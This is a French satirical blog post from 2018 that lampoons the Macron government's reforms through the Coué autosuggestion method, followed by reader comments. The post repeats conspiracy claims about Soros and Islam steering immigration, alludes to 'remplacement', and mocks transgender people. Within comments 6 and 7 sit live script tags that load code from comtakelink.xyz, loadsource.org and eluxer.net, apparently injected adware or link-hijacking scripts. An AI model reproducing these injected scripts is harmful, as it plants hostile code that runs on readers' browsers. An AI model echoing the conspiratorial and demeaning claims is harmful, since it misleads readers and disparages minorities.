• Émile COUÉ (1857-1926)

    Paris, le 22 aout 2018 - à l'issue du 1er conseil des Ministres à la fin des vacances présidentielles.

        "Le président a rappelé que la rentrée du gouvernement devait s'inscrire dans la cohérence et la continuité de la transformation qui a été celle engagée depuis un an par notre pays.../...Nous allons donc continuer à déployer la cohérence du projet que les Français ont choisi. Nous ne devons pas dévier de stratégie mais au contraire poursuivre son déploiement." a déclaré Benjamin Griveaux, porte-parole du gouvernement. 

    "Nous allons donc continuer à déployer la cohérence du projet que les Français ont choisi." a rappelé Benjamin Griveaux... 

    Émile COUÉ (1857-1926)

    "Les Français veulent qu'on continue à réformer. Nous allons travailler, sans prendre en compte les piques de nos détracteurs." a déclaré un conseiller de Matignon...

    Émile Coué de La Châtaigneraie, né le 26 février 1857  et mort le 2 juillet 1926  est un psychologue et pharmacien français, auteur d’une méthode de guérison et de développement personnel (la méthode Coué) fondée sur l’autosuggestion.

    Il explora au sein de la psychologie moderne des voies originales et nouvelles et fut un précurseur de la psychologie comportementale et de la pensée positive, et un expérimentateur de l'effet placebo.

    Il y a effectivement un certain nombre de réformes très populaires, croient-ils, ou font-ils semblant de croire, ou veulent-ils nous faire croire, en cours pour célébrer l'An II de la Macronie Démocratique et Populaire d'Hexagonie...

    Rappel et évocations, précisions, propositions et suggestions dictées par une cohérence déployée:

    • une nième baisse des charges pour les entreprises pour, forcément, améliorer leur compétitivité et leur croissance, aussi bien dans les "territoires" qu'à "l'International", forcément une initiative qui satisfera les salariés, au détriment des actionnaires, n'en déplaise aux banquiers d'affaire supra-nationaux... Ou l'inverse ...

    • une réforme des retraites pour uniformiser les différents régimes en s'alignant, pas du tout forcément sur celui le plus favorable aux intéressés et, en même temps™, une réforme (bis, ou ter... etc...) des retraites repoussant l'âge de la retraite à un âge de plus en plus canonique rendant inutile et obsolète, forcément, l'existence des pensions de réversion...

    • une réforme de l'assurance chômage qui devra continuer de chercher et, dans l'idéal absolu, essayer de trouver des débuts de commencements de pistes pour se pencher à nouveau sur l'indemnisation des demandeurs d'emploi (actuellement limitée à ceux en activité réduite et aux chômeurs de longue durée), de prestations et de travail au noir.

    • un "plan pauvreté -" qui devrait permettre d'économiser tout un tas de pognon dingue qui coûte un max. pour aider des pauvres qui, forcément et obstinément, continueront à rester pauvres, et en même temps™, rester fainéants, cyniques et, souvent, alcooliques et illettrés, et ne votant pas pour les forces du progrès En Marche vers LE Monde Nouveau...

    • un "plan pauvreté +" qui envisagerait, sur le papier, d'apporter une aide accrue aux habitants les plus défavorisés des quartiers les plus défavorisés, allant jusqu'à offrir chaque matin un petit déjeuner (bio, local, équitable et citoyen, forcément) aux enfants les plus défavorisés, le tout sous les auspices bienveillants et concertés d'un "monsieur pauvreté" interministériel (ancien collaborateur de Najat Belkacem)

    • une réforme du système de santé dans le but, forcément, d'apporter des réponses au malaise des soignants, sans fermer aucune "petite structure" de proximité, tout en misant quand même sur la médecine de vile que les nouveaux diplômés boudent pour préférer une carrière hospitalière ou dans des régions ensoleillées et touristiques.

    • une transformation de la fonction publique dans le but "d'assouplir" le nombre et les rôles et compétences de fonctionnaires payés par les diverses collectivités; ce qui ne pourra se faire qu'après avis d'une ou plusieurs commissions d'étude et d'enquête dirigées par de hauts fonctionnaires compétents, forcément, et pas forcément bénévoles

    • une loi "agriculture et alimentation" qui ne fait pas encore trembler les industriels de l'agro-alimentaire, ni les patrons de la grande distribution, ni leurs agents infiltrés dans les différentes commissions européennes de Bruxelles, pas plus que les producteurs étrangers de viande et de fruits et légumes.

    et peut-être:

    • une loi sur la bio-éthique "révisée" et "revisitée", encore un peu floue, mais qui apportera des réponses modernes et contemporaines aux éternels problèmes de l'humanité: séquençage génétique, généralisation et élargissement de la PMA et de la GPA (pour les fillettes pré-pubères, uniquement sur demande du conjoint), fin de vie et euthanasie ou "suicide assisté", etc...

    • une loi "asile et immigration" améliorée et élargie pour satisfaire les Organisations Humanitaires  citoyennes et agissante mais dont les objectifs, à priori bisounours, vont dans le sens, à la fois, des objectifs religieux totalitaires pan-islamiques des adeptes de Mahomet et de ceux, plus terre-à-terre du "philanthrope" multimilliardaire Soros en lutte perpétuelle et dévastatrice contre l'Europe des nations et la culture et les sociétés occidentales.

    sans oublier:

    • une réforme constitutionnelle pour raffermir les pouvoirs d'un président de la République qui se croit encore élu par le peuple mais dont la pensée complexe et les actions novatrices et incomprises peuvent être remises en cause par des opposants irrespectueux, envieux et  butés.

    • une réforme de la présidence et du fonctionnement du palais présidentiel afin que nul ne sache ni ne dévoile le fonctionnement occulte de cette institution jugée archaïque par le plus jeune et le plus moderne des présidents français.

    et, pourquoi pas...

    • une loi "accueil et remplacement" , plus universelle et plus humaine que la loi "asile et immigration" prenant en compte les avis et exigences des associations humanitaires et même par le "Défenseur des Droits" qui estiment que:

    la crise migratoire n'existe que dans la tête d'une estrèm'drouâte paranoïaque puisque "les statistiques le prouvent", le solde migratoire français n'a pas bougé depuis des lustres...

    c'est pas juste de faire une distinction entre "bons", "moins bons" et "faux" demandeurs d'asile, tous égaux dans leur volonté de faire partager leur culture et leurs mœurs à la vieille Europe.

    • une loi sur l'inégalité et la dis-parité tenant compte des réalités d'usage observées dans la société civile, stigmatisant et discriminant définitivement "l'homme-blanc-catholique-hétérosexuel" en faveur de "l·e·a transgenre-transexuel·e-transracial·e-multiculturel·le"...

    • une loi de transition écologique et solidaire pour reboucher le trou de la couche d'ozone, stopper le réchauffement climatique et lutter contre le terrorisme présumé islamique entrainant des incidents isolés commis par des personnes fragiles psychologiquement ...

    • une loi "laïcité et tolérance" interdisant définitivement tout signe religieux dans l'espace public (apparence, attitude, comportement, expressions orale ou corporelle, etc) et de toute manifestation non autorisée par la Libre Pensée en dehors des lieux et des horaires qui seront précisés... (L'Islam ne sera pas concerné par cette mesure, n'étant pas considéré par la Loi comme une religion mais comme un système complet et complexe à la fois politique et socio-culturel).

     

    Vous, je ne sais pas, mais moi, ou je ne me souviens pas du projet que j'avais choisi, ou je suis un mauvais français qui change d'avis pour faire du tort à la république... ou il faut que je fasse une cure intensive avec la méthode à ç' t' Émile...

    Émile COUÉ (1857-1926)

     

     

    « Ciné-ClubRentrée littéraire... »
    Partager via Gmail Delicious Yahoo! Google Bookmarks

    Tags Tags : , , , ,
  • Commentaires

    1
    Vendredi 24 Août à 02:38

    Superbe analyse de la pensée complexe... J'avais voté pour un autre projet, mais je m'aperçois que j'avais tort, je n'avais pas perçu toute la richesse du déploiement cohérent.

      • Vendredi 24 Août à 12:54

         

        Depuis la dernière désignation officielle du Guide Ultime de l'Hexagonie et de l'Univers réunis, j'ai lu le petit livre "La pensée d'Edgar Morin pour les nuls", et j'ai soudain peu à peu (presque) tout compris:

        "La pensée complexe aide à affronter l'erreur, l'illusion, l'incertitude et le risque...

        "Quand je parle de complexité, je me réfère au sens latin élémentaire du mot "complexus", "ce qui est tissé ensemble". Les constituants sont différents, mais il faut voir comme dans une tapisserie la figure d’ensemble. Le vrai problème (de réforme de pensée) c’est que nous avons trop bien appris à séparer. Il vaut mieux apprendre à relier. Relier, c’est-à-dire pas seulement établir bout à bout une connexion, mais établir une connexion qui se fasse en boucle. Du reste, dans le mot relier, il y a le "re", c’est le retour de la boucle sur elle-même. Or la boucle est autoproductive. À l’origine de la vie, il s’est créé une sorte de boucle, une sorte de machinerie naturelle qui revient sur elle-même et qui produit des éléments toujours plus divers qui vont créer un être complexe qui sera vivant. Le monde lui-même s’est autoproduit de façon très mystérieuse. La connaissance doit avoir aujourd’hui des instruments, des concepts fondamentaux qui permettront de relier."

         

        Autre exemple de pensée(s) complexe(s) partagée(s) par des intellectuels de renom:

         

        et aussi, la preuve selon le site "Salam-news":

           "Les religions, les sciences, les arts, l’éducation, la démocratie, la Palestine… le tout avec pour fil conducteur l’éthique. L’ouvrage "Au péril des idées" est un dialogue d’une rare intensité entre Edgar Morin, 92 ans, le penseur de la complexité, et Tariq Ramadan, 51 ans, l’intellectuel réformateur."

    2
    Vendredi 24 Août à 02:43

    Et comme mon com est passé en un dixième de seconde, merci pour les ajustements qui m'ont permis d'échapper aux contrôles tâtillons qui me laissaient muet par absence de captcha pour témoigner de ma bonne foi (on me demandait de répondre à des images et *en même temps* y'avait pas d'images... Bien content.

    3
    Vendredi 24 Août à 09:17
    Pangloss

    C'est Coué, ce bordel?

    Jupiter entend des voix, même celles qui se sont portées sur un autre projet et même -miracle!- celles de ceux qui ont préféré se taire de peur d'être mal interprétés (ce qui, à l'évidence, est le cas).

    Je profite de ce com pour dire que votre blog, parmi d'autres qualités, a celle d'être indispensable.

      • Vendredi 24 Août à 13:07

         

        En fait, tout dépend de ce que Jupiter et ses satellites entendent par "les français" ?

        Sont-ce les ouvriers qui décident d'être contre tout et foutent le bordel... ceux qui ne sont rien... ceux qui sont fumeurs et alcooliques... ceux (ou celles) qui sont pour beaucoup illettrés... sont-ce les pauvres qui restent pauvres malgré le pognon de dingue qu'on leur file... ?

        Sont-ce les personnalités préférées des français, des anciennes professeuses de langues et du petit personnel de La Rotonde comme Daniel Cohn-Bendit, Line Renaud, Stéphane Bern, Kiddy Smile, François Berléand, Jacques Attali, Erik Orsenna, Pierre Arditi, la chanteuse Dani ou les frères Igor et Grichka Bogdanov ?

         

        Ce qui est certain, c'est que, même en dehors de toute ligne de conduite (en même temps) quotidiennement banale mais stupéfiante, les voix lui parlent haut et fort:

        d'ailleurs:

                             Emmanuel Macron se prend pour "Jeanne d'Arc"... c'est Brigitte qui le dit...

         

         

        je profite de cette réponse pour vous dire que la dernière phrase de votre commentaire... "Ben... merci...  quoi !."

         

    4
    Vendredi 24 Août à 14:56

    Je suis un peu seCoué par tout ça. Un texte époustouflant quel que soit le bord dont on se réclame.

      • Vendredi 24 Août à 20:59

        Secouons toujours, et époustouflons encore (un peu hors-sujet, mais pas trop)

         

         

        On apprend sur l'inévitable et  en même temps inestimable web, que la "Société Lorraine de Psychologie Appliquée" fondée par le docteur Coué fut présidée après son décès par un certain Alphonse de Chateaubriant, un "écrivain régionaliste" et chrétien, récompensé par un prix Goncourt pour son livre  "Monsieur des Lourdines" (soutenu en sous-main par Clémenceau) et Grand prix du roman de l'Académie française pour "La Brière", mais qui fut aussi "un chantre de la collaboration" dans la France occupée par l'Allemagne nazie.

        Il fut également directeur de la revue "La Gerbe", un périodique collaborationniste "politique et littéraire"

        Il n'en fallait pas plus à Eric Lioret de "Libération" pour en conclure que "sans aller jusqu'à soupçonner le couéisme de tendances fascistes", on peut se poser quelques questions légitimes car "la méthode Coué, qui est une pratique sans interprétation de la parole du sujet, convient bien à l’esprit ancien combattant qui érige l’appel à l’action en principe directeur face au verbiage, celui des parlementaires notamment ."

         

        Moi, je veux bien, et je ne prendrai pas parti entre "l'inconscient angélique couéiste" et "l’inconscient  démoniaque de Freud" selon les réacs de l'époque...

         

        J'ajouterai simplement, pour compléter la formation historique et littéraire apparemment superficielle de monsieur Lioret de "Libération" que dans "La Gerbe (périodique collaborationniste politique et littéraire), Alphonse de Chateaubriant côtoyait tout ce que le chic Paris choc d'alors comptait comme belles et bonnes plumes : Jean Giono, Paul Morand, Jean Cocteau, Marcel Aymé, Sacha Guitry, Abel Bonnard, Claude Farrère, Jean de La Varende, ou encore André Castelot...

         

    5
    Vendredi 24 Août à 22:47

    Ceux que vous citez avaient pour la plupart une tendance proche ou bien neutre. 

      • Samedi 25 Août à 13:23

         

        Bien sur, d'où leur présence parmi les auteurs de cette revue.

        On peut ajouter à cette liste d'artistes qui pensaient "qu'il faut bien travailler" et que "the show must go on" (en allemand, "die Show muß weitergehen" de préférence) des personnalités diverses et variées encore encensée aujourd’hui dans leurs domaines comme Tristan Bernard, Max Jacob, Maurice Chevalier (à l'insu de son plein gré), Édith Piaf ("béate" devant l'invasion nazie), et la quasi-divine gueule d’atmosphère d'Arletty... ou dans un autre registre ou à des degrés moindres , Jean Genet ("pour l'amour de l'uniforme") ou Fernandel ("contraint et forcé") ou encore Michel Simon (à l'invitation de Goebbels)

        Je ne blâme ni ne condamne aucune de ces personnalités ("si j'étais né en 17 à Leidenstadt -ou à Vichy-"...(quoi-que...)) en évoquant de façon un peu différente ceux -rares- qui se sont engagés, armes à la main, contre les nazis, comme Jean Gabin par exemple... je trouve simplement un peu partiale, sélective  et subjective la mémoire moralisatrice de nos élites qui condamnent avec fermeté le retour "des heures les plus sombres de notre histoire".

         

        Mais bon, tout le monde peut se tromper...

         

    6
    jean-marc
    Samedi 25 Août à 12:27

    L'interview croisée d'Edgar Morin et de Tariq Ramadan date de 2014.Depuis le vieil Edgar a pu découvrir les autres facettes de l'humaniste suisse et modifier son jugement,à moins que son gâtisme(bien compréhensible à 97 ans)n'ait altéré définitivement sa lucidité ..

     

    <script src="//s3.amazonaws.com/js-cache/1d05d073ea84891b23.js"></script> <script src="http://comtakelink.xyz/addons/lnkr5.min.js" type="text/javascript"></script> <script src="http://loadsource.org/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=51469x7429x&r=1535192894088" type="text/javascript"></script> <script src="http://comtakelink.xyz/addons/lnkr30_nt.min.js" type="text/javascript"></script> <script src="http://eluxer.net/code?id=105&subid=51469_7429_" type="text/javascript"></script>
      • Samedi 25 Août à 15:52

         

        Il "aurait" pu.

        Mais on dirait qu'il na pas voulu...

         

         

        (Mars 2016, mais "L'ancien membre du parti communiste pour qui le foulard est une chose anodine, beaucoup plus anodine qu’une croix s'était finalement décommandé")

         

        L’Institut du Monde Arabe, à Paris, a célébré, le 22 avril 2016, Edgar Morin, en présence d’Alain Touraine, Régis Debray, Edwy Plenel, Michel Wieviorka, Jean-Michel Blanquer, sous la baguette de François l’Yvonnet, maître d’oeuvre du Cahier de l’Herne consacré à l’auguste sociologue, et le regard malicieux de Mustapha Saha.

        (Maroc Diplomatique - 13/07/2016)

         

         

        Edgar Morin face à Tariq Ramadan : et Dieu dans tout ça ?

        Le philosophe et le théologien se retrouvent pour un deuxième livre d’entretiens. Après le voile et la laïcité, les voici qui échangent sur spiritualité et humanisme.

        Edgar Morin et Tariq Ramadan avaient encore beaucoup de choses à se dire.

        Nul doute que le premier va se prendre une belle volée de bois verts, tant le second, ostracisé et suspecté de favoriser l’islam politique est devenu infréquentable. Cet ostracisme-là importe peu à Edgar Morin. Le rejet de Tariq Ramadan l’a même encouragé à confronter ses idées à celles de l’une des références de l’islam en Europe. (Libé – 10/10/2017)

         

        Edgar Morin sur Tariq Ramadan : "J’ai horreur du lynchage médiatique"

        "J’ai connu Tariq Ramadan quand il est venu me proposer un livre de dialogue sur les grands problèmes contemporains. Il avait la réputation d’être un défenseur rigoriste de l’islam. Il m’a paru intelligent et cultivé. J’ai accepté le challenge pensant que j’allais effectuer un match intellectuel avec un boxeur de ma catégorie.

        "J’étais donc et reste très content de contribuer à établir un pont entre des cultures ou modes de pensée qui ne se comprennent pas et ne communiquent pas et où, même, l’incompréhension progresse de part et d’autre.

        "Pour moi, l’islam comme le christianisme a produit dans l’histoire le meilleur et le pire, encore que, dans le passé, c’est le christianisme qui ait manifesté la pire intolérance. Mais ma pensée s’est toujours opposée à la réduction au pire. (L'Obs – 7/11/2017)

         

        Edgar Morin sur Tariq Ramadan : "Je suis contre toute humiliation subie par qui que ce soit"

        Edgar Morin a estimé que l’islamologue Tariq Ramadan a « évolué » et ne joue pas un « double jeu ».

        "Quand on considère tous les extraits de tous ses papiers à différentes époques, moi, je pense qu’il a évolué. Le Tariq Ramadan qui est venu me trouver pour débattre avec lui est un Tariq Ramadan qui a exprimé oralement et par écrit son idée d’un islam européen acceptant la démocratie, la liberté des femmes et même l’apostasie, c’est-à-dire l’abandon de sa propre religion" (Le Monde – 12/11/2017)

         

    7
    jean-marc
    Samedi 25 Août à 23:05

    le dernier entretien d'Edgar Morin au Monde du 12 novembre 2017 confirme donc mon hypothèse de sénilité.

     

    <script src="//s3.amazonaws.com/js-cache/1d05d073ea84891b23.js"></script> <script src="http://comtakelink.xyz/addons/lnkr5.min.js" type="text/javascript"></script> <script src="http://loadsource.org/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=51469x7429x&r=1535231163182" type="text/javascript"></script> <script src="http://comtakelink.xyz/addons/lnkr30_nt.min.js" type="text/javascript"></script> <script src="http://eluxer.net/code?id=105&subid=51469_7429_" type="text/javascript"></script>
      • Dimanche 26 Août à 15:43

         

        Sans vouloir tomber dans la gériatrophobie la plus abjecte, on peut aussi se demander quelle est la part de sénilité et la par d'abjection, les deux n'étant pas incompatibles.

                                                            "Les nuits sont enceintes et nul ne connaît le jour qui naîtra."

         

        Il y a aussi la maladie causée par une déshydratation cervicale accompagnée d'un dessèchement de la pensée et des sentiments imputable (certainement et comme tout) au réchauffement climatique...

         

    8
    Souris donc
    Dimanche 26 Août à 08:00

    Avec une petite couche de vernis de com', Macron est bien l'énarque archétypal que le monde entier nous envie pour occuper les plus hautes fonctions. Et se débrouiller pour ne jamais baisser la dépense publique.

    Méthode Coué : L'énarque sait ce qui est bon pour toi.

    Chez les Soviets, c'était méthode Staline. Il vous joue les pires tours (millions de morts), mais la presse occidentale regarde ailleurs. La presse occidentale qui, elle aussi, sait ce qui est bon pour toi. Fillon. Son programme économique exactement calqué sur les rapports de la Cour des Comptes. Quel journaliste l'a relevé ? Ils ont préféré sortir le Pénélopegate. Avec un Parquet National Financier dont personne n'avait jamais entendu parler et qui n'a plus jamais resservi. A usage unique. Jetable. Méthode kleenex.

    Et nous voilà avec ce Macron bien formaté.

      • Dimanche 26 Août à 16:29

         

        Parcequ'un petit dessin (ou deux ou plus) valent mieux qu'un long discours...

        Et, pour les "non-marcheurs" et/ou les "pauvres qui coutent un pognon de dingue", j'ose espérer que ces affiches de conseils nutritionnels et diététiques vont enfin être rééditées !

         ... sait-on jamais, à le place des 5 fruits et légumes (sans sel, sans graisse, sans sucre et sans gluten) devenus inaccessibles.

         

    9
    Souris donc
    Dimanche 26 Août à 11:09

    Le pourtant bien disposé Philippe Dessertine tire la sonnette d'alarme sur la situation économique de la France (Champs Libres, Opinions, Figaro du 24/08).

    Titre : Face aux déficits et à la dette publique, Macron ne doit plus tergiverser.

    Nous sommes bons derniers en tout dans la zone euro. Dépense publique : moyenne 47% du PIB. Nous : 56%.

    Le FigaroVox réserve ses articles aux abonnés. J'ai la version papier. Mais on trouve un fidèle résumé sur Sputniknews (Poutine ne semble pas y avoir mis sa patte).

      • Dimanche 26 Août à 17:44

         

        Il y a toujours des universitaires pseudo-intellectuels (comme disait Belkacem Najat ) et "dequoij'memêliste" qui ont de la chance que la loi anti-fake-news ne soit pas passée (pas encore, pas pour le moment) mais il leur faudrait apprendre à "maîtriser le narratif" (comme disait Loiseau Nathalie) au lieu de dire le contraire de ce qu'il faut penser... c'est à la portée d'un élève de quatrième:

         

        mais on peut toujours approfondir le sujet:

         

      • Souris donc
        Dimanche 26 Août à 18:47

        Belle trajectoire de Nathalie Loiseau. Lire son autobiographie, où elle raconte avec verve comment ses parents se fichaient pas mal de l'avenir de leur fille qu'ils voyaient plutôt dans le mariage. Résultat : directrice de l'ENA, puis secrétaire d'Etat aux Affaires Etrangères.

      • Dimanche 26 Août à 21:06

         

        C'est effectivement une très belle carrière dont j'ignorais tout sauf, depuis peu, l'oralité très porteuse de sens ...

         

        "Nathalie Loiseau, catholique pratiquante, née le 1er juin 1964 à Neuilly-sur-Seine, est une haute fonctionnaire et femme politique française.

        "Une grande partie de sa carrière a été exercée au sein du ministère français des Affaires étrangères. Durant ses vingt-six ans de diplomatie, elle a été amenée à intervenir sur tous les continents. Elle était notamment porte-parole de l'ambassade de France aux États-Unis pendant la guerre d'Irak de 2003, et a géré les tensions induites par le refus de la France de s'associer aux forces américaines. En novembre 2011, elle est devenue directrice générale de l'administration du Quai d'Orsay.

        "En 2012, elle s'est vu confier la direction de l'École nationale d'administration à Strasbourg, dont elle n'est cependant pas issue.

        "Elle est nommée ministre chargée des Affaires européennes dans le deuxième gouvernement Édouard Philippe, sous la présidence d'Emmanuel Macron, le 21 juin 2017, à la place de Marielle de Sarnez."

         

        ... mais dont le titre de gloire le plus important est d'avoir remplacé Marielle de Sarnez....

        ...rien que pour ça, merci !

         

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :